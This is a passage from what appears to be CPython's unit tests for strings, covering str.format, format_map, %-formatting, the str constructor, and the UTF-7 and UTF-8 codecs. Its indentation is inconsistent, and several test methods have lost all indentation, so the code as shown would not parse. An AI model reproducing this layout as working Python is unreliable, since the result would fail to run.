        self.assertEqual("My name is {0[name]}".format(dict(name='Fred')),
                         "My name is Fred")
        self.assertEqual("My name is {0} :-{{}}".format('Fred'),
                         "My name is Fred :-{}")

        d = datetime.date(2007, 8, 18)
        self.assertEqual("The year is {0.year}".format(d),
                         "The year is 2007")

        # classes we'll use for testing
        class C:
            def __init__(self, x=100):
                self._x = x
            def __format__(self, spec):
                return spec

        class D:
            def __init__(self, x):
                self.x = x
            def __format__(self, spec):
                return str(self.x)

        # class with __str__, but no __format__
        class E:
            def __init__(self, x):
                self.x = x
            def __str__(self):
                return 'E(' + self.x + ')'

        # class with __repr__, but no __format__ or __str__
        class F:
            def __init__(self, x):
                self.x = x
            def __repr__(self):
                return 'F(' + self.x + ')'

        # class with __format__ that forwards to string, for some format_spec's
        class G:
            def __init__(self, x):
                self.x = x
            def __str__(self):
                return "string is " + self.x
            def __format__(self, format_spec):
                if format_spec == 'd':
                    return 'G(' + self.x + ')'
                return object.__format__(self, format_spec)

        class I(datetime.date):
            def __format__(self, format_spec):
                return self.strftime(format_spec)

        class J(int):
            def __format__(self, format_spec):
                return int.__format__(self * 2, format_spec)

        class M:
            def __init__(self, x):
                self.x = x
            def __repr__(self):
                return 'M(' + self.x + ')'
            __str__ = None

        class N:
            def __init__(self, x):
                self.x = x
            def __repr__(self):
                return 'N(' + self.x + ')'
            __format__ = None

        self.assertEqual(''.format(), '')
        self.assertEqual('abc'.format(), 'abc')
        self.assertEqual('{0}'.format('abc'), 'abc')
        self.assertEqual('{0:}'.format('abc'), 'abc')
#        self.assertEqual('{ 0 }'.format('abc'), 'abc')
        self.assertEqual('X{0}'.format('abc'), 'Xabc')
        self.assertEqual('{0}X'.format('abc'), 'abcX')
        self.assertEqual('X{0}Y'.format('abc'), 'XabcY')
        self.assertEqual('{1}'.format(1, 'abc'), 'abc')
        self.assertEqual('X{1}'.format(1, 'abc'), 'Xabc')
        self.assertEqual('{1}X'.format(1, 'abc'), 'abcX')
        self.assertEqual('X{1}Y'.format(1, 'abc'), 'XabcY')
        self.assertEqual('{0}'.format(-15), '-15')
        self.assertEqual('{0}{1}'.format(-15, 'abc'), '-15abc')
        self.assertEqual('{0}X{1}'.format(-15, 'abc'), '-15Xabc')
        self.assertEqual('{{'.format(), '{')
        self.assertEqual('}}'.format(), '}')
        self.assertEqual('{{}}'.format(), '{}')
        self.assertEqual('{{x}}'.format(), '{x}')
        self.assertEqual('{{{0}}}'.format(123), '{123}')
        self.assertEqual('{{{{0}}}}'.format(), '{{0}}')
        self.assertEqual('}}{{'.format(), '}{')
        self.assertEqual('}}x{{'.format(), '}x{')

        # weird field names
        self.assertEqual("{0[foo-bar]}".format({'foo-bar':'baz'}), 'baz')
        self.assertEqual("{0[foo bar]}".format({'foo bar':'baz'}), 'baz')
        self.assertEqual("{0[ ]}".format({' ':3}), '3')

        self.assertEqual('{foo._x}'.format(foo=C(20)), '20')
        self.assertEqual('{1}{0}'.format(D(10), D(20)), '2010')
        self.assertEqual('{0._x.x}'.format(C(D('abc'))), 'abc')
        self.assertEqual('{0[0]}'.format(['abc', 'def']), 'abc')
        self.assertEqual('{0[1]}'.format(['abc', 'def']), 'def')
        self.assertEqual('{0[1][0]}'.format(['abc', ['def']]), 'def')
        self.assertEqual('{0[1][0].x}'.format(['abc', [D('def')]]), 'def')

        # strings
        self.assertEqual('{0:.3s}'.format('abc'), 'abc')
        self.assertEqual('{0:.3s}'.format('ab'), 'ab')
        self.assertEqual('{0:.3s}'.format('abcdef'), 'abc')
        self.assertEqual('{0:.0s}'.format('abcdef'), '')
        self.assertEqual('{0:3.3s}'.format('abc'), 'abc')
        self.assertEqual('{0:2.3s}'.format('abc'), 'abc')
        self.assertEqual('{0:2.2s}'.format('abc'), 'ab')
        self.assertEqual('{0:3.2s}'.format('abc'), 'ab ')
        self.assertEqual('{0:x<0s}'.format('result'), 'result')
        self.assertEqual('{0:x<5s}'.format('result'), 'result')
        self.assertEqual('{0:x<6s}'.format('result'), 'result')
        self.assertEqual('{0:x<7s}'.format('result'), 'resultx')
        self.assertEqual('{0:x<8s}'.format('result'), 'resultxx')
        self.assertEqual('{0: <7s}'.format('result'), 'result ')
        self.assertEqual('{0:<7s}'.format('result'), 'result ')
        self.assertEqual('{0:>7s}'.format('result'), ' result')
        self.assertEqual('{0:>8s}'.format('result'), '  result')
        self.assertEqual('{0:^8s}'.format('result'), ' result ')
        self.assertEqual('{0:^9s}'.format('result'), ' result  ')
        self.assertEqual('{0:^10s}'.format('result'), '  result  ')
        self.assertEqual('{0:10000}'.format('a'), 'a' + ' ' * 9999)
        self.assertEqual('{0:10000}'.format(''), ' ' * 10000)
        self.assertEqual('{0:10000000}'.format(''), ' ' * 10000000)

        # issue 12546: use \x00 as a fill character
        self.assertEqual('{0:\x00<6s}'.format('foo'), 'foo\x00\x00\x00')
        self.assertEqual('{0:\x01<6s}'.format('foo'), 'foo\x01\x01\x01')
        self.assertEqual('{0:\x00^6s}'.format('foo'), '\x00foo\x00\x00')
        self.assertEqual('{0:^6s}'.format('foo'), ' foo  ')

        self.assertEqual('{0:\x00<6}'.format(3), '3\x00\x00\x00\x00\x00')
        self.assertEqual('{0:\x01<6}'.format(3), '3\x01\x01\x01\x01\x01')
        self.assertEqual('{0:\x00^6}'.format(3), '\x00\x003\x00\x00\x00')
        self.assertEqual('{0:<6}'.format(3), '3     ')

        self.assertEqual('{0:\x00<6}'.format(3.14), '3.14\x00\x00')
        self.assertEqual('{0:\x01<6}'.format(3.14), '3.14\x01\x01')
        self.assertEqual('{0:\x00^6}'.format(3.14), '\x003.14\x00')
        self.assertEqual('{0:^6}'.format(3.14), ' 3.14 ')

        self.assertEqual('{0:\x00<12}'.format(3+2.0j), '(3+2j)\x00\x00\x00\x00\x00\x00')
        self.assertEqual('{0:\x01<12}'.format(3+2.0j), '(3+2j)\x01\x01\x01\x01\x01\x01')
        self.assertEqual('{0:\x00^12}'.format(3+2.0j), '\x00\x00\x00(3+2j)\x00\x00\x00')
        self.assertEqual('{0:^12}'.format(3+2.0j), '   (3+2j)   ')

        # format specifiers for user defined type
        self.assertEqual('{0:abc}'.format(C()), 'abc')

        # !r, !s and !a coercions
        self.assertEqual('{0!s}'.format('Hello'), 'Hello')
        self.assertEqual('{0!s:}'.format('Hello'), 'Hello')
        self.assertEqual('{0!s:15}'.format('Hello'), 'Hello          ')
        self.assertEqual('{0!s:15s}'.format('Hello'), 'Hello          ')
        self.assertEqual('{0!r}'.format('Hello'), "'Hello'")
        self.assertEqual('{0!r:}'.format('Hello'), "'Hello'")
        self.assertEqual('{0!r}'.format(F('Hello')), 'F(Hello)')
        self.assertEqual('{0!r}'.format('\u0378'), "'\\u0378'") # nonprintable
        self.assertEqual('{0!r}'.format('\u0374'), "'\u0374'")  # printable
        self.assertEqual('{0!r}'.format(F('\u0374')), 'F(\u0374)')
        self.assertEqual('{0!a}'.format('Hello'), "'Hello'")
        self.assertEqual('{0!a}'.format('\u0378'), "'\\u0378'") # nonprintable
        self.assertEqual('{0!a}'.format('\u0374'), "'\\u0374'") # printable
        self.assertEqual('{0!a:}'.format('Hello'), "'Hello'")
        self.assertEqual('{0!a}'.format(F('Hello')), 'F(Hello)')
        self.assertEqual('{0!a}'.format(F('\u0374')), 'F(\\u0374)')

        # test fallback to object.__format__
        self.assertEqual('{0}'.format({}), '{}')
        self.assertEqual('{0}'.format([]), '[]')
        self.assertEqual('{0}'.format([1]), '[1]')

        self.assertEqual('{0:d}'.format(G('data')), 'G(data)')
        self.assertEqual('{0!s}'.format(G('data')), 'string is data')

        self.assertRaises(TypeError, '{0:^10}'.format, E('data'))
        self.assertRaises(TypeError, '{0:^10s}'.format, E('data'))
        self.assertRaises(TypeError, '{0:>15s}'.format, G('data'))

        self.assertEqual("{0:date: %Y-%m-%d}".format(I(year=2007,
                                                       month=8,
                                                       day=27)),
                         "date: 2007-08-27")

        # test deriving from a builtin type and overriding __format__
        self.assertEqual("{0}".format(J(10)), "20")

        # string format specifiers
        self.assertEqual('{0:}'.format('a'), 'a')

        # computed format specifiers
        self.assertEqual("{0:.{1}}".format('hello world', 5), 'hello')
        self.assertEqual("{0:.{1}s}".format('hello world', 5), 'hello')
        self.assertEqual("{0:.{precision}s}".format('hello world', precision=5), 'hello')
        self.assertEqual("{0:{width}.{precision}s}".format('hello world', width=10, precision=5), 'hello     ')
        self.assertEqual("{0:{width}.{precision}s}".format('hello world', width='10', precision='5'), 'hello     ')

        # test various errors
        self.assertRaises(ValueError, '{'.format)
        self.assertRaises(ValueError, '}'.format)
        self.assertRaises(ValueError, 'a{'.format)
        self.assertRaises(ValueError, 'a}'.format)
        self.assertRaises(ValueError, '{a'.format)
        self.assertRaises(ValueError, '}a'.format)
        self.assertRaises(IndexError, '{0}'.format)
        self.assertRaises(IndexError, '{1}'.format, 'abc')
        self.assertRaises(KeyError,   '{x}'.format)
        self.assertRaises(ValueError, "}{".format)
        self.assertRaises(ValueError, "abc{0:{}".format)
        self.assertRaises(ValueError, "{0".format)
        self.assertRaises(IndexError, "{0.}".format)
        self.assertRaises(ValueError, "{0.}".format, 0)
        self.assertRaises(ValueError, "{0[}".format)
        self.assertRaises(ValueError, "{0[}".format, [])
        self.assertRaises(KeyError,   "{0]}".format)
        self.assertRaises(ValueError, "{0.[]}".format, 0)
        self.assertRaises(ValueError, "{0..foo}".format, 0)
        self.assertRaises(ValueError, "{0[0}".format, 0)
        self.assertRaises(ValueError, "{0[0:foo}".format, 0)
        self.assertRaises(KeyError,   "{c]}".format)
        self.assertRaises(ValueError, "{{ {{{0}}".format, 0)
        self.assertRaises(ValueError, "{0}}".format, 0)
        self.assertRaises(KeyError,   "{foo}".format, bar=3)
        self.assertRaises(ValueError, "{0!x}".format, 3)
        self.assertRaises(ValueError, "{0!}".format, 0)
        self.assertRaises(ValueError, "{0!rs}".format, 0)
        self.assertRaises(ValueError, "{!}".format)
        self.assertRaises(IndexError, "{:}".format)
        self.assertRaises(IndexError, "{:s}".format)
        self.assertRaises(IndexError, "{}".format)
        big = "23098475029384702983476098230754973209482573"
        self.assertRaises(ValueError, ("{" + big + "}").format)
        self.assertRaises(ValueError, ("{[" + big + "]}").format, [0])

        # issue 6089
        self.assertRaises(ValueError, "{0[0]x}".format, [None])
        self.assertRaises(ValueError, "{0[0](10)}".format, [None])

        # can't have a replacement on the field name portion
        self.assertRaises(TypeError, '{0[{1}]}'.format, 'abcdefg', 4)

        # exceed maximum recursion depth
        self.assertRaises(ValueError, "{0:{1:{2}}}".format, 'abc', 's', '')
        self.assertRaises(ValueError, "{0:{1:{2:{3:{4:{5:{6}}}}}}}".format,
                          0, 1, 2, 3, 4, 5, 6, 7)

        # string format spec errors
        self.assertRaises(ValueError, "{0:-s}".format, '')
        self.assertRaises(ValueError, format, "", "-")
        self.assertRaises(ValueError, "{0:=s}".format, '')

        # Alternate formatting is not supported
        self.assertRaises(ValueError, format, '', '#')
        self.assertRaises(ValueError, format, '', '#20')

        # Non-ASCII
        self.assertEqual("{0:s}{1:s}".format("ABC", "\u0410\u0411\u0412"),
                         'ABC\u0410\u0411\u0412')
        self.assertEqual("{0:.3s}".format("ABC\u0410\u0411\u0412"),
                         'ABC')
        self.assertEqual("{0:.0s}".format("ABC\u0410\u0411\u0412"),
                         '')

        # field names containing brace-like characters as dict keys
        self.assertEqual("{[{}]}".format({"{}": 5}), "5")
        self.assertEqual("{[{}]}".format({"{}" : "a"}), "a")
        self.assertEqual("{[{]}".format({"{" : "a"}), "a")
        self.assertEqual("{[}]}".format({"}" : "a"}), "a")
        self.assertEqual("{[[]}".format({"[" : "a"}), "a")
        self.assertEqual("{[!]}".format({"!" : "a"}), "a")
        self.assertRaises(ValueError, "{a{}b}".format, 42)
        self.assertRaises(ValueError, "{a{b}".format, 42)
        self.assertRaises(ValueError, "{[}".format, 42)

        self.assertEqual("0x{:0{:d}X}".format(0x0,16), "0x0000000000000000")

        # Blocking fallback: __str__ = None forbids the !s/str() path,
        # __format__ = None forbids format() entirely.
        m = M('data')
        self.assertEqual("{!r}".format(m), 'M(data)')
        self.assertRaises(TypeError, "{!s}".format, m)
        self.assertRaises(TypeError, "{}".format, m)
        n = N('data')
        self.assertEqual("{!r}".format(n), 'N(data)')
        self.assertEqual("{!s}".format(n), 'N(data)')
        self.assertRaises(TypeError, "{}".format, n)
    def test_format_map(self):
        """str.format_map: mapping-based substitution (including a mapping
        with __missing__ and a non-dict mapping), and rejection of
        positional auto-numbered fields."""
        self.assertEqual(''.format_map({}), '')
        self.assertEqual('a'.format_map({}), 'a')
        self.assertEqual('ab'.format_map({}), 'ab')
        self.assertEqual('a{{'.format_map({}), 'a{')
        self.assertEqual('a}}'.format_map({}), 'a}')
        self.assertEqual('{{b'.format_map({}), '{b')
        self.assertEqual('}}b'.format_map({}), '}b')
        self.assertEqual('a{{b'.format_map({}), 'a{b')

        # using mappings
        class Mapping(dict):
            def __missing__(self, key):
                return key
        self.assertEqual('{hello}'.format_map(Mapping()), 'hello')
        self.assertEqual('{a} {world}'.format_map(Mapping(a='hello')), 'hello world')

        class InternalMapping:
            def __init__(self):
                self.mapping = {'a': 'hello'}
            def __getitem__(self, key):
                return self.mapping[key]
        self.assertEqual('{a}'.format_map(InternalMapping()), 'hello')


        class C:
            def __init__(self, x=100):
                self._x = x
            def __format__(self, spec):
                return spec
        self.assertEqual('{foo._x}'.format_map({'foo': C(20)}), '20')

        # test various errors
        self.assertRaises(TypeError, ''.format_map)
        self.assertRaises(TypeError, 'a'.format_map)

        self.assertRaises(ValueError, '{'.format_map, {})
        self.assertRaises(ValueError, '}'.format_map, {})
        self.assertRaises(ValueError, 'a{'.format_map, {})
        self.assertRaises(ValueError, 'a}'.format_map, {})
        self.assertRaises(ValueError, '{a'.format_map, {})
        self.assertRaises(ValueError, '}a'.format_map, {})

        # issue #12579: can't supply positional params to format_map
        self.assertRaises(ValueError, '{}'.format_map, {'a' : 2})
        self.assertRaises(ValueError, '{}'.format_map, 'a')
        self.assertRaises(ValueError, '{a} {}'.format_map, {"a" : 2, "b" : 1})
def test_format_huge_precision(self):
format_string = ".{}f".format(sys.maxsize + 1)
with self.assertRaises(ValueError):
result = format(2.34, format_string)
def test_format_huge_width(self):
format_string = "{}f".format(sys.maxsize + 1)
with self.assertRaises(ValueError):
result = format(2.34, format_string)
def test_format_huge_item_number(self):
format_string = "{{{}:.6f}}".format(sys.maxsize + 1)
with self.assertRaises(ValueError):
result = format_string.format(2.34)
def test_format_auto_numbering(self):
    """Auto-numbered '{}' fields: they accept conversions, attribute/item
    access and nested specs, may be mixed with named fields, but must not
    be mixed with explicitly numbered fields."""
    class C:
        def __init__(self, x=100):
            self._x = x
        def __format__(self, spec):
            # echo the spec so the test can observe what was passed in
            return spec
    self.assertEqual('{}'.format(10), '10')
    self.assertEqual('{:5}'.format('s'), 's    ')
    self.assertEqual('{!r}'.format('s'), "'s'")
    self.assertEqual('{._x}'.format(C(10)), '10')
    self.assertEqual('{[1]}'.format([1, 2]), '2')
    self.assertEqual('{[a]}'.format({'a':4, 'b':2}), '4')
    self.assertEqual('a{}b{}c'.format(0, 1), 'a0b1c')
    self.assertEqual('a{:{}}b'.format('x', '^10'), 'a    x     b')
    self.assertEqual('a{:{}x}b'.format(20, '#'), 'a0x14b')
    # can't mix and match numbering and auto-numbering
    self.assertRaises(ValueError, '{}{1}'.format, 1, 2)
    self.assertRaises(ValueError, '{1}{}'.format, 1, 2)
    self.assertRaises(ValueError, '{:{1}}'.format, 1, 2)
    self.assertRaises(ValueError, '{0:{}}'.format, 1, 2)
    # can mix and match auto-numbering and named
    self.assertEqual('{f}{}'.format(4, f='test'), 'test4')
    self.assertEqual('{}{f}'.format(4, f='test'), '4test')
    self.assertEqual('{:{f}}{g}{}'.format(1, 3, g='g', f=2), ' 1g3')
    self.assertEqual('{f:{}}{}{g}'.format(2, 4, f=1, g='g'), ' 14g')
def test_formatting(self):
    """printf-style (%) formatting on str: conversions, *-widths and
    *-precisions, %c with non-BMP code points, mapping-based formats,
    nan/inf, and __int__/__index__ handling for integer conversions
    (issue #19995). Also runs the shared mixin's formatting tests."""
    string_tests.MixinStrUnicodeUserStringTest.test_formatting(self)
    # Testing Unicode formatting strings...
    self.assertEqual("%s, %s" % ("abc", "abc"), 'abc, abc')
    self.assertEqual("%s, %s, %i, %f, %5.2f" % ("abc", "abc", 1, 2, 3), 'abc, abc, 1, 2.000000, 3.00')
    self.assertEqual("%s, %s, %i, %f, %5.2f" % ("abc", "abc", 1, -2, 3), 'abc, abc, 1, -2.000000, 3.00')
    self.assertEqual("%s, %s, %i, %f, %5.2f" % ("abc", "abc", -1, -2, 3.5), 'abc, abc, -1, -2.000000, 3.50')
    self.assertEqual("%s, %s, %i, %f, %5.2f" % ("abc", "abc", -1, -2, 3.57), 'abc, abc, -1, -2.000000, 3.57')
    self.assertEqual("%s, %s, %i, %f, %5.2f" % ("abc", "abc", -1, -2, 1003.57), 'abc, abc, -1, -2.000000, 1003.57')
    if not sys.platform.startswith('java'):
        self.assertEqual("%r, %r" % (b"abc", "abc"), "b'abc', 'abc'")
        self.assertEqual("%r" % ("\u1234",), "'\u1234'")
        self.assertEqual("%a" % ("\u1234",), "'\\u1234'")
    self.assertEqual("%(x)s, %(y)s" % {'x':"abc", 'y':"def"}, 'abc, def')
    self.assertEqual("%(x)s, %(\xfc)s" % {'x':"abc", '\xfc':"def"}, 'abc, def')
    # %c accepts a code point (including non-BMP) or a 1-char string
    self.assertEqual('%c' % 0x1234, '\u1234')
    self.assertEqual('%c' % 0x21483, '\U00021483')
    self.assertRaises(OverflowError, "%c".__mod__, (0x110000,))
    self.assertEqual('%c' % '\U00021483', '\U00021483')
    self.assertRaises(TypeError, "%c".__mod__, "aa")
    self.assertRaises(ValueError, "%.1\u1032f".__mod__, (1.0/3))
    self.assertRaises(TypeError, "%i".__mod__, "aa")
    # formatting jobs delegated from the string implementation:
    self.assertEqual('...%(foo)s...' % {'foo':"abc"}, '...abc...')
    self.assertEqual('...%(foo)s...' % {'foo':"abc"}, '...abc...')
    self.assertEqual('...%(foo)s...' % {'foo':"abc"}, '...abc...')
    self.assertEqual('...%(foo)s...' % {'foo':"abc"}, '...abc...')
    self.assertEqual('...%(foo)s...' % {'foo':"abc",'def':123}, '...abc...')
    self.assertEqual('...%(foo)s...' % {'foo':"abc",'def':123}, '...abc...')
    self.assertEqual('...%s...%s...%s...%s...' % (1,2,3,"abc"), '...1...2...3...abc...')
    self.assertEqual('...%%...%%s...%s...%s...%s...%s...' % (1,2,3,"abc"), '...%...%s...1...2...3...abc...')
    self.assertEqual('...%s...' % "abc", '...abc...')
    # *-widths and *-precisions taken from the argument tuple
    self.assertEqual('%*s' % (5,'abc',), '  abc')
    self.assertEqual('%*s' % (-5,'abc',), 'abc  ')
    self.assertEqual('%*.*s' % (5,2,'abc',), '   ab')
    self.assertEqual('%*.*s' % (5,3,'abc',), '  abc')
    self.assertEqual('%i %*.*s' % (10, 5,3,'abc',), '10   abc')
    self.assertEqual('%i%s %*.*s' % (10, 3, 5, 3, 'abc',), '103   abc')
    self.assertEqual('%c' % 'a', 'a')
    class Wrapper:
        def __str__(self):
            return '\u1234'
    self.assertEqual('%s' % Wrapper(), '\u1234')
    # issue 3382
    NAN = float('nan')
    INF = float('inf')
    self.assertEqual('%f' % NAN, 'nan')
    self.assertEqual('%F' % NAN, 'NAN')
    self.assertEqual('%f' % INF, 'inf')
    self.assertEqual('%F' % INF, 'INF')
    # PEP 393: precision counts characters, not bytes
    self.assertEqual('%.1s' % "a\xe9\u20ac", 'a')
    self.assertEqual('%.2s' % "a\xe9\u20ac", 'a\xe9')
    #issue 19995
    class PseudoInt:
        def __init__(self, value):
            self.value = int(value)
        def __int__(self):
            return self.value
        def __index__(self):
            return self.value
    class PseudoFloat:
        # has __int__ but no __index__, so integer conversions must reject it
        def __init__(self, value):
            self.value = float(value)
        def __int__(self):
            return int(self.value)
    pi = PseudoFloat(3.1415)
    letter_m = PseudoInt(109)
    self.assertEqual('%x' % 42, '2a')
    self.assertEqual('%X' % 15, 'F')
    self.assertEqual('%o' % 9, '11')
    self.assertEqual('%c' % 109, 'm')
    self.assertEqual('%x' % letter_m, '6d')
    self.assertEqual('%X' % letter_m, '6D')
    self.assertEqual('%o' % letter_m, '155')
    self.assertEqual('%c' % letter_m, 'm')
    # NOTE: the trailing commas below build throwaway 1-tuples around each
    # statement's result; they are harmless and preserved as written.
    self.assertRaisesRegex(TypeError, '%x format: an integer is required, not float', operator.mod, '%x', 3.14),
    self.assertRaisesRegex(TypeError, '%X format: an integer is required, not float', operator.mod, '%X', 2.11),
    self.assertRaisesRegex(TypeError, '%o format: an integer is required, not float', operator.mod, '%o', 1.79),
    self.assertRaisesRegex(TypeError, '%x format: an integer is required, not PseudoFloat', operator.mod, '%x', pi),
    self.assertRaises(TypeError, operator.mod, '%c', pi),
def test_formatting_with_enum(self):
    """%-formatting with enum members (issue #18780): %s uses the member
    repr-style name, while %d/%i/%u/%f convert through the mixed-in type."""
    # issue18780
    import enum
    class Float(float, enum.Enum):
        PI = 3.1415926
    class Int(enum.IntEnum):
        IDES = 15
    class Str(str, enum.Enum):
        ABC = 'abc'
    # Testing Unicode formatting strings...
    self.assertEqual("%s, %s" % (Str.ABC, Str.ABC),
                     'Str.ABC, Str.ABC')
    self.assertEqual("%s, %s, %d, %i, %u, %f, %5.2f" %
                     (Str.ABC, Str.ABC,
                      Int.IDES, Int.IDES, Int.IDES,
                      Float.PI, Float.PI),
                     'Str.ABC, Str.ABC, 15, 15, 15, 3.141593, 3.14')
    # formatting jobs delegated from the string implementation:
    self.assertEqual('...%(foo)s...' % {'foo':Str.ABC},
                     '...Str.ABC...')
    self.assertEqual('...%(foo)s...' % {'foo':Int.IDES},
                     '...Int.IDES...')
    self.assertEqual('...%(foo)i...' % {'foo':Int.IDES},
                     '...15...')
    self.assertEqual('...%(foo)d...' % {'foo':Int.IDES},
                     '...15...')
    self.assertEqual('...%(foo)u...' % {'foo':Int.IDES, 'def':Float.PI},
                     '...15...')
    self.assertEqual('...%(foo)f...' % {'foo':Float.PI,'def':123},
                     '...3.141593...')
def test_formatting_huge_precision(self):
format_string = "%.{}f".format(sys.maxsize + 1)
with self.assertRaises(ValueError):
result = format_string % 2.34
def test_issue28598_strsubclass_rhs(self):
# A subclass of str with an __rmod__ method should be able to hook
# into the % operator
class SubclassedStr(str):
def __rmod__(self, other):
return 'Success, self.__rmod__({!r}) was called'.format(other)
self.assertEqual('lhs %% %r' % SubclassedStr('rhs'),
"Success, self.__rmod__('lhs %% %r') was called")
@support.cpython_only
def test_formatting_huge_precision_c_limits(self):
    """CPython-only: a %-format precision just past the C 'int' range must
    raise ValueError instead of silently overflowing (uses _testcapi)."""
    from _testcapi import INT_MAX
    format_string = "%.{}f".format(INT_MAX + 1)
    with self.assertRaises(ValueError):
        result = format_string % 2.34
def test_formatting_huge_width(self):
format_string = "%{}f".format(sys.maxsize + 1)
with self.assertRaises(ValueError):
result = format_string % 2.34
def test_startswith_endswith_errors(self):
for meth in ('foo'.startswith, 'foo'.endswith):
with self.assertRaises(TypeError) as cm:
meth(['f'])
exc = str(cm.exception)
self.assertIn('str', exc)
self.assertIn('tuple', exc)
@support.run_with_locale('LC_ALL', 'de_DE', 'fr_FR')
def test_format_float(self):
    """%-formatting of floats must always use the C locale's '.' decimal
    point, even while a comma-decimal locale (de_DE/fr_FR) is active."""
    # should not format with a comma, but always with C locale
    self.assertEqual('1.0', '%.1f' % 1.0)
def test_constructor(self):
    """str(obj) conversions: plain str, str subclasses, objects with
    __str__, and the decoding form str(bytes_like, encoding, errors)."""
    # unicode(obj) tests (this maps to PyObject_Unicode() at C level)
    self.assertEqual(
        str('unicode remains unicode'),
        'unicode remains unicode'
    )
    # StrSubclass is a module-level helper subclass of str (defined
    # elsewhere in this file).
    for text in ('ascii', '\xe9', '\u20ac', '\U0010FFFF'):
        subclass = StrSubclass(text)
        self.assertEqual(str(subclass), text)
        self.assertEqual(len(subclass), len(text))
        if text == 'ascii':
            self.assertEqual(subclass.encode('ascii'), b'ascii')
            self.assertEqual(subclass.encode('utf-8'), b'ascii')
    self.assertEqual(
        str('strings are converted to unicode'),
        'strings are converted to unicode'
    )
    class StringCompat:
        def __init__(self, x):
            self.x = x
        def __str__(self):
            return self.x
    self.assertEqual(
        str(StringCompat('__str__ compatible objects are recognized')),
        '__str__ compatible objects are recognized'
    )
    # unicode(obj) is compatible to str():
    o = StringCompat('unicode(obj) is compatible to str()')
    self.assertEqual(str(o), 'unicode(obj) is compatible to str()')
    self.assertEqual(str(o), 'unicode(obj) is compatible to str()')
    for obj in (123, 123.45, 123):
        self.assertEqual(str(obj), str(str(obj)))
    # unicode(obj, encoding, error) tests (this maps to
    # PyUnicode_FromEncodedObject() at C level)
    if not sys.platform.startswith('java'):
        # passing an encoding with an already-str object is an error
        self.assertRaises(
            TypeError,
            str,
            'decoding unicode is not supported',
            'utf-8',
            'strict'
        )
    self.assertEqual(
        str(b'strings are decoded to unicode', 'utf-8', 'strict'),
        'strings are decoded to unicode'
    )
    if not sys.platform.startswith('java'):
        # any buffer-protocol object can be decoded, not just bytes
        self.assertEqual(
            str(
                memoryview(b'character buffers are decoded to unicode'),
                'utf-8',
                'strict'
            ),
            'character buffers are decoded to unicode'
        )
    self.assertRaises(TypeError, str, 42, 42, 42)
def test_constructor_keyword_args(self):
"""Pass various keyword argument combinations to the constructor."""
# The object argument can be passed as a keyword.
self.assertEqual(str(object='foo'), 'foo')
self.assertEqual(str(object=b'foo', encoding='utf-8'), 'foo')
# The errors argument without encoding triggers "decode" mode.
self.assertEqual(str(b'foo', errors='strict'), 'foo') # not "b'foo'"
self.assertEqual(str(object=b'foo', errors='strict'), 'foo')
def test_constructor_defaults(self):
"""Check the constructor argument defaults."""
# The object argument defaults to '' or b''.
self.assertEqual(str(), '')
self.assertEqual(str(errors='strict'), '')
utf8_cent = '¢'.encode('utf-8')
# The encoding argument defaults to utf-8.
self.assertEqual(str(utf8_cent, errors='strict'), '¢')
# The errors argument defaults to strict.
self.assertRaises(UnicodeDecodeError, str, utf8_cent, encoding='ascii')
def test_codecs_utf7(self):
    """UTF-7 codec: RFC 2152 examples, '+' escaping, lone surrogates
    (passed through), and the direct/optional-direct character sets."""
    utfTests = [
        ('A\u2262\u0391.', b'A+ImIDkQ.'),             # RFC2152 example
        ('Hi Mom -\u263a-!', b'Hi Mom -+Jjo--!'),     # RFC2152 example
        ('\u65E5\u672C\u8A9E', b'+ZeVnLIqe-'),        # RFC2152 example
        ('Item 3 is \u00a31.', b'Item 3 is +AKM-1.'), # RFC2152 example
        ('+', b'+-'),
        ('+-', b'+--'),
        ('+?', b'+-?'),
        (r'\?', b'+AFw?'),
        ('+?', b'+-?'),
        (r'\\?', b'+AFwAXA?'),
        (r'\\\?', b'+AFwAXABc?'),
        (r'++--', b'+-+---'),
        ('\U000abcde', b'+2m/c3g-'),                  # surrogate pairs
        ('/', b'/'),
    ]
    for (x, y) in utfTests:
        self.assertEqual(x.encode('utf-7'), y)
    # Unpaired surrogates are passed through
    self.assertEqual('\uD801'.encode('utf-7'), b'+2AE-')
    self.assertEqual('\uD801x'.encode('utf-7'), b'+2AE-x')
    self.assertEqual('\uDC01'.encode('utf-7'), b'+3AE-')
    self.assertEqual('\uDC01x'.encode('utf-7'), b'+3AE-x')
    self.assertEqual(b'+2AE-'.decode('utf-7'), '\uD801')
    self.assertEqual(b'+2AE-x'.decode('utf-7'), '\uD801x')
    self.assertEqual(b'+3AE-'.decode('utf-7'), '\uDC01')
    self.assertEqual(b'+3AE-x'.decode('utf-7'), '\uDC01x')
    self.assertEqual('\uD801\U000abcde'.encode('utf-7'), b'+2AHab9ze-')
    self.assertEqual(b'+2AHab9ze-'.decode('utf-7'), '\uD801\U000abcde')
    # Issue #2242: crash on some Windows/MSVC versions
    self.assertEqual(b'+\xc1'.decode('utf-7', 'ignore'), '')
    # Direct encoded characters
    set_d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'(),-./:?"
    # Optional direct characters
    set_o = '!"#$%&*;<=>@[]^_`{|}'
    for c in set_d:
        self.assertEqual(c.encode('utf7'), c.encode('ascii'))
        self.assertEqual(c.encode('ascii').decode('utf7'), c)
    for c in set_o:
        self.assertEqual(c.encode('ascii').decode('utf7'), c)
def test_codecs_utf8(self):
    """UTF-8 codec: encoding of BMP/non-BMP code points, surrogatepass
    for lone surrogates, a long mixed-script round trip, and a few
    decoding spot checks."""
    self.assertEqual(''.encode('utf-8'), b'')
    self.assertEqual('\u20ac'.encode('utf-8'), b'\xe2\x82\xac')
    self.assertEqual('\U00010002'.encode('utf-8'), b'\xf0\x90\x80\x82')
    self.assertEqual('\U00023456'.encode('utf-8'), b'\xf0\xa3\x91\x96')
    # lone surrogates are encodable only with the surrogatepass handler
    self.assertEqual('\ud800'.encode('utf-8', 'surrogatepass'), b'\xed\xa0\x80')
    self.assertEqual('\udc00'.encode('utf-8', 'surrogatepass'), b'\xed\xb0\x80')
    self.assertEqual(('\U00010002'*10).encode('utf-8'),
                     b'\xf0\x90\x80\x82'*10)
    self.assertEqual(
        '\u6b63\u78ba\u306b\u8a00\u3046\u3068\u7ffb\u8a33\u306f'
        '\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3002\u4e00'
        '\u90e8\u306f\u30c9\u30a4\u30c4\u8a9e\u3067\u3059\u304c'
        '\u3001\u3042\u3068\u306f\u3067\u305f\u3089\u3081\u3067'
        '\u3059\u3002\u5b9f\u969b\u306b\u306f\u300cWenn ist das'
        ' Nunstuck git und'.encode('utf-8'),
